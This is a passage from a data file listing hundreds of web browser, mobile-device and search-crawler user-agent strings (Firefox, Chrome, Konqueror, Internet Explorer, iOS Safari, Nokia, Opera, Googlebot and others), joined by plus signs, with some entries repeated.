Gecko/20100101 Firefox/100.0 +Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 +Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 +Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 +Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a +Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 +Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 +Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 +Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 +Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre +Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 +Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 +Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre +Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 +Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 +Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 +Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 +Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 +Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko +Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 +Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 +Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 +Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 +Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M +Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 +Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 +Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 +Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 +Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 +Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 +Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; +Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) +Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) +Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 +Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 +Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) +Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) +Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 +NetSurf/1.2 (NetBSD; amd64) +Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 +Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 +Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 +NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 +Offline Explorer/2.5 +Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 +Opera/7.50 (Windows ME; U) [en] +Opera/7.50 (Windows XP; U) +Opera/7.51 (Windows NT 5.1; U) [en] +Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) +Opera/9.0 (Macintosh; PPC Mac OS X; U; en) +Opera/9.20 (Macintosh; Intel Mac OS X; U; en) +Opera/9.25 (Windows NT 6.0; U; en) +Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) +Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 +Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) +Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 +Opera/9.60 